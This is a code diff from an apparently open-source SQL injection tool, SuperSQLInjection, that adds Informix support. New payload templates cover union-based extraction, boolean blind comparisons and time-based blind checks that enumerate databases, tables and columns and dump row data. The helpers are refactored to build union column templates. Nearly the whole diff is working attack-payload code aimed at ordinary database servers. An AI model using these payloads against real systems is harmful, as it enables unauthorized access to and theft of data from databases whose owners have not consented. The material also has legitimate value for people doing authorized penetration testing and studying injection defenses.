SQLite=7 SQLite=7,
Informix=8
} }
} }

10
SuperSQLInjection/payload/Comm.cs
View File

@@ -59,7 +59,15 @@ namespace SuperSQLInjection.payload
sb.Append(" from sysibm.sysdummy1"); sb.Append(" from sysibm.sysdummy1");
return sb.ToString(); return sb.ToString();
} }
public static String unionColumnCountTestByInformix(String unionTempaldate, String fill)
{
StringBuilder sb = new StringBuilder(" 1=2 union all select ");
sb.Append(unionTempaldate.Replace("{data}", fill));
sb.Append(" from sysmaster:sysdual");
return sb.ToString();
}
public static String unionColumnCountTest(int maxColumn, int testIndex, String fill) public static String unionColumnCountTest(int maxColumn, int testIndex, String fill)
{ {

126
SuperSQLInjection/payload/Informix.cs Normal file
View File

@@ -0,0 +1,126 @@
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class Informix
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/informix.txt";
public static List<String> vers = FileTool.readFileToList(path);
//数据库数量
public static String dbs_count = "(select count(*) from sysmaster:sysdatabases)";
//表数量
public static String tables_count = "(select count(*) from {dbname}:systables where tabtype='T' and tabid>99)";
//列数量
public static String columns_count = "(select count(*) from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}')";
//获取数据库名
public static String db_value = "(select name from (select skip {index} first 1 name from sysmaster:sysdatabases))";
//获取表名称
public static String table_value = "(select tabname from (select skip {index} first 1 tabname from {dbname}:systables where tabtype='T' and tabid>99))";
//获取列名称
public static String column_value = "(select colname from (select skip {index} first 1 colname from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}'))";
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
//获取列数量bool
public static String bool_columns_count = " " + columns_count + ">{len}";
public static String substr = "substr(({data})),{index},1)";
//多字节
public static String hex_value = "ascii({data})";
//bool方式字符长度判断
public static String bool_length = " length(({data}))>{len}";
//bool方式获取值
public static String bool_value = " ascii(substr({data},{index},1))>{len}";
//最大32767
public static String cast_value = "rtrim(cast({data} as char(32767)))";
public static String no_cast_value = "({data})";
//获取行数据
public static String data_value = "(select "+ cast_value + " from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
//获取行数据
public static String data_no_cast_value = "(select {data} from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
//union获取数据条数
public static String data_count = "(select count(*) from {dbname}:{table})";
public static String bool_datas_count = " " + data_count + ">={len}";
//union获取值
public static String union_value = " 1=2 union all select {data} from sysmaster:sysdual";
public static String rand = Tools.RandNum(3);
public static String start = rand + 0;
public static String mid = rand + 5;
public static String end = rand + 9;
public static String getBoolDataBySleep(String data)
{
return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
}
public static String getBoolCountBySleep(String data)
{
return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
}
public static String getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index,String castStr)
{
String temlate=unionFileTemplate.Replace("{data}", "(to_char("+start+ ")||to_char(" + start + ")||" + castStr.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||to_char(" + end + ")||to_char(" + end + "))");
return union_value.Replace("{data}", temlate);
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
decimal c = 32000 / columns.Count;
int max = (int)Math.Ceiling(c);
foreach (String column in columns)
{
sb.Append(cast_value.Replace("32767", max.ToString()).Replace("{data}", column) + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
{
String data = "to_char(" + start + ")||to_char(" + start + ")||" + unionColumns(columns,"||to_char("+ mid + ")||") + "||to_char(" + end + ")||to_char(" + end + ")";
String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
return union_value.Replace("{data}", template);
}
/// <summary>
/// 获得bool方式值payload
/// </summary>
/// <param name="dataStr">对应值的查询SQL</param>
/// <param name="dbName">数据库名</param>
/// <param name="table">表名</param>
/// <param name="index">下标</param>
/// <returns></returns>
public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
{
String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
return payload;
}
}
}

38
SuperSQLInjection/tools/Tools.cs
View File

@@ -711,6 +711,10 @@ namespace tools
{ {
return strToChrOrChar(str, "chr", joinStr, encode); return strToChrOrChar(str, "chr", joinStr, encode);
} }
public static String informixStrToChr(String randstr)
{
return "to_char("+ randstr + ")";
}
/// <summary> /// <summary>
/// 转换chr供SQLServer替换库名防止单引号被拦截或过滤 /// 转换chr供SQLServer替换库名防止单引号被拦截或过滤
@@ -1195,15 +1199,27 @@ namespace tools
} }
//DB2的每列是数字或者字符的穷举 //DB2的每列是数字或者字符的穷举
private static String[] fillStr = { "1", "chr(32)"}; private static String[] DB2_fillStr = { "1", "chr(32)"};
/// <summary> private static String[] Infomix_fillStr = { "1", "''" };
/// 获得DB2的每列是数字或者字符的穷举
/// </summary>
/// <param name="n">总列数</param>
/// <returns></returns> // 获得DB2的每列是数字或者字符的穷举
public static List<String> getDB2UnionTemplates(int sumCount, int showIndex) public static List<String> getDB2UnionTemplates(int sumCount, int showIndex)
{
return getUnionTemplates(DB2_fillStr, sumCount, showIndex);
}
// 获得informix的每列是数字或者字符的穷举
public static List<String> getInformixUnionTemplates(int sumCount, int showIndex)
{
return getUnionTemplates(Infomix_fillStr, sumCount, showIndex);
}
// 获得数据库的每列是数字或者字符的穷举
private static List<String> getUnionTemplates(String[] fillStr,int sumCount, int showIndex)
{ {
List < String > list= new List<String>(); List < String > list= new List<String>();
if (sumCount == 1) if (sumCount == 1)
@@ -1214,10 +1230,10 @@ namespace tools
else { else {
int n = sumCount - 1; int n = sumCount - 1;
String[] codes = new String[2 << (n - 1)]; String[] codes = new String[2 << (n - 1)];
createGrayCode(codes, n); createGrayCode(fillStr,codes, n);
foreach(String code in codes) foreach(String code in codes)
{ {
String cp = insertDB2ShowTemplate(code,showIndex); String cp = insertShowTemplate(code, showIndex);
list.Add(cp); list.Add(cp);
//插入,显示列 //插入,显示列
} }
@@ -1225,14 +1241,14 @@ namespace tools
return list; return list;
} }
private static String insertDB2ShowTemplate(String temlate,int showIndex) { private static String insertShowTemplate(String temlate,int showIndex) {
List<String> list = new List<String>(temlate.Split(',')); List<String> list = new List<String>(temlate.Split(','));
list.Insert(showIndex,"{data}"); list.Insert(showIndex,"{data}");
return String.Join(",", list); return String.Join(",", list);
} }
private static void createGrayCode(String[] codes, int n) private static void createGrayCode(String[] fillStr, String[] codes, int n)
{ {
if (n == 1) if (n == 1)
{ {
@@ -1241,7 +1257,7 @@ namespace tools
} }
else else
{ {
createGrayCode(codes, n - 1); createGrayCode(fillStr,codes, n - 1);
int len = 2 << (n - 1); int len = 2 << (n - 1);
int half = len >> 1; int half = len >> 1;
for (int i = len - 1, j = 0; i >= 0; i--) for (int i = len - 1, j = 0; i >= 0; i--)

BIN
超级SQL注入工具使用说明书V1.1 20190110.docx
View File

Binary file not shown.